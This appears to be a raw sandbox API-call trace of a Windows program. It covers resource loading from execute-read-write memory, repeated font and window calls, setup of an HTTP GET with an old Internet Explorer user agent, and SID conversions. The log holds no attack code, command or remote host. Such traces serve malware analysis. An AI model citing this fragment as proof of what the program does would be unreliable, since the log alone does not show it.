[0100.241] GetCurrentThreadId () returned 0xf80
[0100.241] VirtualQuery (in: lpAddress=0x2991668, lpBuffer=0xef254, dwLength=0x1c | out: lpBuffer=0xef254*(BaseAddress=0x2991000, AllocationBase=0x28d0000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0100.241] FindResourceA (hModule=0x28d0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x29d8990
[0100.241] FindResourceA (hModule=0x28d0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x29d8990
[0100.241] LoadResource (hModule=0x28d0000, hResInfo=0x29d8990) returned 0x29df044
[0100.241] SizeofResource (hModule=0x28d0000, hResInfo=0x29d8990) returned 0xca5
[0100.241] LockResource (hResData=0x29df044) returned 0x29df044
[0100.241] GetCurrentThreadId () returned 0xf80
[0100.242] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xef008, fWinIni=0x0 | out: pvParam=0xef008) returned 1
[0100.242] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xef008, fWinIni=0x0 | out: pvParam=0xef008) returned 1
[0100.242] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xef008, fWinIni=0x0 | out: pvParam=0xef008) returned 1
[0100.242] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xef008, fWinIni=0x0 | out: pvParam=0xef008) returned 1
[0100.243] GetDC (hWnd=0x0) returned 0x6010890
[0100.243] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeefec | out: lptm=0xeefec) returned 1
[0100.243] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0100.244] CreateFontIndirectA (lplf=0xeefa4) returned 0xe0a089b
[0100.245] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.245] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef024 | out: lptm=0xef024) returned 1
[0100.245] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.245] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.245] GetSystemMetrics (nIndex=6) returned 1
[0100.245] VirtualAlloc (lpAddress=0x29f4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x29f4000
[0100.245] GetDC (hWnd=0x0) returned 0x6010890
[0100.245] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeefec | out: lptm=0xeefec) returned 1
[0100.246] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.246] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef024 | out: lptm=0xef024) returned 1
[0100.246] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.246] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.246] GetSystemMetrics (nIndex=6) returned 1
[0100.246] GetDC (hWnd=0x0) returned 0x6010890
[0100.246] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeefec | out: lptm=0xeefec) returned 1
[0100.246] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.246] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef024 | out: lptm=0xef024) returned 1
[0100.246] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.246] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.246] GetSystemMetrics (nIndex=6) returned 1
[0100.247] GetDC (hWnd=0x0) returned 0x6010890
[0100.247] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeefec | out: lptm=0xeefec) returned 1
[0100.247] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.247] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef024 | out: lptm=0xef024) returned 1
[0100.247] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.247] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.247] GetSystemMetrics (nIndex=6) returned 1
[0100.247] GetDC (hWnd=0x0) returned 0x6010890
[0100.247] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef000 | out: lptm=0xef000) returned 1
[0100.247] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.247] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef038 | out: lptm=0xef038) returned 1
[0100.247] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.247] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.247] GetSystemMetrics (nIndex=6) returned 1
[0100.248] GetDC (hWnd=0x0) returned 0x6010890
[0100.248] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed04 | out: lptm=0xeed04) returned 1
[0100.248] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.248] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed3c | out: lptm=0xeed3c) returned 1
[0100.248] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.248] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.248] GetSystemMetrics (nIndex=6) returned 1
[0100.248] GetDC (hWnd=0x0) returned 0x6010890
[0100.248] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef000 | out: lptm=0xef000) returned 1
[0100.248] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.248] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef038 | out: lptm=0xef038) returned 1
[0100.248] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.248] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.248] GetSystemMetrics (nIndex=6) returned 1
[0100.249] GetDC (hWnd=0x0) returned 0x6010890
[0100.249] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed04 | out: lptm=0xeed04) returned 1
[0100.249] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.249] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed3c | out: lptm=0xeed3c) returned 1
[0100.249] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.249] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.249] GetSystemMetrics (nIndex=6) returned 1
[0100.249] GetDC (hWnd=0x0) returned 0x6010890
[0100.249] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef000 | out: lptm=0xef000) returned 1
[0100.249] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.249] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef038 | out: lptm=0xef038) returned 1
[0100.249] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.249] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.249] GetSystemMetrics (nIndex=6) returned 1
[0100.249] GetDC (hWnd=0x0) returned 0x6010890
[0100.249] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed04 | out: lptm=0xeed04) returned 1
[0100.249] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.250] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed3c | out: lptm=0xeed3c) returned 1
[0100.250] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.250] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.250] GetSystemMetrics (nIndex=6) returned 1
[0100.250] GetDC (hWnd=0x0) returned 0x6010890
[0100.250] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeefec | out: lptm=0xeefec) returned 1
[0100.250] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.250] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef024 | out: lptm=0xef024) returned 1
[0100.250] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.250] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.250] GetSystemMetrics (nIndex=6) returned 1
[0100.251] GetDC (hWnd=0x0) returned 0x6010890
[0100.251] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeefec | out: lptm=0xeefec) returned 1
[0100.251] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.251] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef024 | out: lptm=0xef024) returned 1
[0100.251] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.251] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.251] GetSystemMetrics (nIndex=6) returned 1
[0100.251] GetDC (hWnd=0x0) returned 0x6010890
[0100.251] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef000 | out: lptm=0xef000) returned 1
[0100.251] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.251] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef038 | out: lptm=0xef038) returned 1
[0100.251] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.251] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.251] GetSystemMetrics (nIndex=6) returned 1
[0100.251] GetDC (hWnd=0x0) returned 0x6010890
[0100.252] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed04 | out: lptm=0xeed04) returned 1
[0100.252] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.252] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed3c | out: lptm=0xeed3c) returned 1
[0100.252] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.252] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.252] GetSystemMetrics (nIndex=6) returned 1
[0100.252] GetDC (hWnd=0x0) returned 0x6010890
[0100.252] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef000 | out: lptm=0xef000) returned 1
[0100.252] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.252] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef038 | out: lptm=0xef038) returned 1
[0100.252] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.252] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.252] GetSystemMetrics (nIndex=6) returned 1
[0100.252] GetDC (hWnd=0x0) returned 0x6010890
[0100.252] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed04 | out: lptm=0xeed04) returned 1
[0100.252] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.252] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed3c | out: lptm=0xeed3c) returned 1
[0100.252] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.252] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.252] GetSystemMetrics (nIndex=6) returned 1
[0100.253] GetDC (hWnd=0x0) returned 0x6010890
[0100.253] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef000 | out: lptm=0xef000) returned 1
[0100.253] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.253] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef038 | out: lptm=0xef038) returned 1
[0100.253] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.253] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.253] GetSystemMetrics (nIndex=6) returned 1
[0100.253] GetDC (hWnd=0x0) returned 0x6010890
[0100.253] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed04 | out: lptm=0xeed04) returned 1
[0100.253] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.253] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed3c | out: lptm=0xeed3c) returned 1
[0100.253] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.253] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.253] GetSystemMetrics (nIndex=6) returned 1
[0100.253] GetDC (hWnd=0x0) returned 0x6010890
[0100.253] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef000 | out: lptm=0xef000) returned 1
[0100.253] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.253] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef038 | out: lptm=0xef038) returned 1
[0100.253] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.253] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.254] GetSystemMetrics (nIndex=6) returned 1
[0100.254] GetDC (hWnd=0x0) returned 0x6010890
[0100.254] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed04 | out: lptm=0xeed04) returned 1
[0100.254] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.254] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeed3c | out: lptm=0xeed3c) returned 1
[0100.254] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.254] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.254] GetSystemMetrics (nIndex=6) returned 1
[0100.254] GetDC (hWnd=0x0) returned 0x6010890
[0100.254] GetTextMetricsA (in: hdc=0x6010890, lptm=0xeefec | out: lptm=0xeefec) returned 1
[0100.254] SelectObject (hdc=0x6010890, h=0xe0a089b) returned 0x18a002e
[0100.254] GetTextMetricsA (in: hdc=0x6010890, lptm=0xef024 | out: lptm=0xef024) returned 1
[0100.254] SelectObject (hdc=0x6010890, h=0x18a002e) returned 0xe0a089b
[0100.254] ReleaseDC (hWnd=0x0, hDC=0x6010890) returned 1
[0100.254] GetSystemMetrics (nIndex=6) returned 1
[0100.256] SysReAllocStringLen (in: pbstr=0x29ff388*=0x0, psz="GET", len=0x3 | out: pbstr=0x29ff388*="GET") returned 1
[0100.256] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.256] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.256] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.256] SysReAllocStringLen (in: pbstr=0x29ff388*="GET", psz="GET", len=0x3 | out: pbstr=0x29ff388*="GET") returned 1
[0100.257] SysReAllocStringLen (in: pbstr=0x29ff3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x29ff3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0100.257] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0xef088, lpdwBufferLength=0xef08c | out: lpBuffer=0xef088, lpdwBufferLength=0xef08c) returned 1
[0100.380] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0xef088, dwBufferLength=0x4) returned 1
[0100.380] VirtualFree (lpAddress=0x2a00000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0100.380] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x29f6490, cbMultiByte=3, lpWideCharStr=0xedfc0, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0100.380] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.380] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.380] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.380] SysReAllocStringLen (in: pbstr=0x29ff388*="GET", psz="GET", len=0x3 | out: pbstr=0x29ff388*="GET") returned 1
[0100.381] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.381] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.381] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.381] SysReAllocStringLen (in: pbstr=0x29ff388*="GET", psz="GET", len=0x3 | out: pbstr=0x29ff388*="GET") returned 1
[0100.382] FlatSB_SetScrollProp (param_1=0x800ea, index=0x200, newValue=0x0, param_4=1) returned 0
[0100.382] GetSysColor (nIndex=20) returned 0xffffff
[0100.382] FlatSB_SetScrollProp (param_1=0x800ea, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0100.382] FlatSB_SetScrollInfo (param_1=0x800ea, code=0, psi=0xedef6, fRedraw=1)
[0100.383] CallWindowProcA (lpPrevWndFunc=0x28d7038, hWnd=0x800ea, Msg=0x46, wParam=0x0, lParam=0xeddf4) returned 0x0
[0100.388] GetTextExtentPoint32A (in: hdc=0xe010895, lpString="0", c=1, psizl=0xef17c | out: psizl=0xef17c) returned 1
[0100.388] IsIconic (hWnd=0x800ea) returned 0
[0100.389] GetClientRect (in: hWnd=0x800ea, lpRect=0xef17c | out: lpRect=0xef17c) returned 1
[0100.389] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.389] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.389] IsIconic (hWnd=0x800ea) returned 0
[0100.389] GetClientRect (in: hWnd=0x800ea, lpRect=0xef0c4 | out: lpRect=0xef0c4) returned 1
[0100.389] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.389] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.389] IsIconic (hWnd=0x800ea) returned 0
[0100.389] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.389] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.389] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.389] IsIconic (hWnd=0x800ea) returned 0
[0100.389] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.389] FlatSB_SetScrollProp (param_1=0x800ea, index=0x200, newValue=0x0, param_4=0) returned 0
[0100.389] GetSysColor (nIndex=20) returned 0xffffff
[0100.389] FlatSB_SetScrollProp (param_1=0x800ea, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0100.389] FlatSB_SetScrollInfo (param_1=0x800ea, code=0, psi=0xef0d2, fRedraw=1) returned 0
[0100.389] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.389] IsIconic (hWnd=0x800ea) returned 0
[0100.389] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.389] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.390] IsIconic (hWnd=0x800ea) returned 0
[0100.390] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.390] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.390] IsIconic (hWnd=0x800ea) returned 0
[0100.390] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.390] FlatSB_SetScrollProp (param_1=0x800ea, index=0x100, newValue=0x0, param_4=0) returned 0
[0100.390] GetSysColor (nIndex=20) returned 0xffffff
[0100.390] FlatSB_SetScrollProp (param_1=0x800ea, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0100.390] FlatSB_SetScrollInfo (param_1=0x800ea, code=1, psi=0xef0d2, fRedraw=1) returned 0
[0100.390] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.390] IsIconic (hWnd=0x800ea) returned 0
[0100.390] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.390] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.390] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.390] IsIconic (hWnd=0x800ea) returned 0
[0100.390] GetClientRect (in: hWnd=0x800ea, lpRect=0xef0c4 | out: lpRect=0xef0c4) returned 1
[0100.390] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.390] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.390] IsIconic (hWnd=0x800ea) returned 0
[0100.390] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.390] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.390] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.390] IsIconic (hWnd=0x800ea) returned 0
[0100.390] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.390] FlatSB_SetScrollProp (param_1=0x800ea, index=0x200, newValue=0x0, param_4=0) returned 0
[0100.390] GetSysColor (nIndex=20) returned 0xffffff
[0100.390] FlatSB_SetScrollProp (param_1=0x800ea, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0100.390] FlatSB_SetScrollInfo (param_1=0x800ea, code=0, psi=0xef0d2, fRedraw=1) returned 0
[0100.391] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.391] IsIconic (hWnd=0x800ea) returned 0
[0100.391] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.391] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.391] IsIconic (hWnd=0x800ea) returned 0
[0100.391] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.391] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.391] IsIconic (hWnd=0x800ea) returned 0
[0100.391] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.391] FlatSB_SetScrollProp (param_1=0x800ea, index=0x100, newValue=0x0, param_4=0) returned 0
[0100.391] GetSysColor (nIndex=20) returned 0xffffff
[0100.391] FlatSB_SetScrollProp (param_1=0x800ea, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0100.391] FlatSB_SetScrollInfo (param_1=0x800ea, code=1, psi=0xef0d2, fRedraw=1) returned 0
[0100.391] GetWindowLongA (hWnd=0x800ea, nIndex=-16) returned 116326400
[0100.391] IsIconic (hWnd=0x800ea) returned 0
[0100.391] GetClientRect (in: hWnd=0x800ea, lpRect=0xef094 | out: lpRect=0xef094) returned 1
[0100.391] GetCurrentThreadId () returned 0xf80
[0100.392] ConvertSidToStringSidA () returned 0x1
[0100.392] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.392] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0100.392] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.392] LocalFree (hMem=0x292f90) returned 0x0
[0100.392] ConvertStringSidToSidA () returned 0x1
[0100.392] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29f2914, pSourceSid=0x292f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x29f2914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.392] IsValidSid (pSid=0x29f2914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.392] ConvertSidToStringSidA () returned 0x1
[0100.392] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.392] LocalFree (hMem=0x292f90) returned 0x0
[0100.392] ConvertStringSidToSidA () returned 0x1
[0100.392] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29f702c, pSourceSid=0x292f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x29f702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.392] IsValidSid (pSid=0x29f702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.392] ConvertSidToStringSidA () returned 0x1
[0100.392] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.393] LocalFree (hMem=0x292f90) returned 0x0
[0100.393] ConvertStringSidToSidA () returned 0x1
[0100.393] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ff5a0, pSourceSid=0x292f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x29ff5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.393] IsValidSid (pSid=0x29ff5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.393] ConvertSidToStringSidA () returned 0x1
[0100.393] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.393] LocalFree (hMem=0x292f90) returned 0x0
[0100.393] ConvertStringSidToSidA () returned 0x1
[0100.393] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ff614, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.393] IsValidSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.393] ConvertSidToStringSidA () returned 0x1
[0100.393] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.393] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.393] ConvertStringSidToSidA () returned 0x1
[0100.393] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ff688, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x29ff688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0100.393] IsValidSid (pSid=0x29ff688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0100.393] ConvertSidToStringSidA () returned 0x1
[0100.393] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.393] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.393] ConvertStringSidToSidA () returned 0x1
[0100.393] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ff6fc, pSourceSid=0x2a6f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x29ff6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0100.393] IsValidSid (pSid=0x29ff6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0100.393] ConvertSidToStringSidA () returned 0x1
[0100.393] LocalFree (hMem=0x29c1c8) returned 0x0
[0100.393] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.393] ConvertStringSidToSidA () returned 0x1
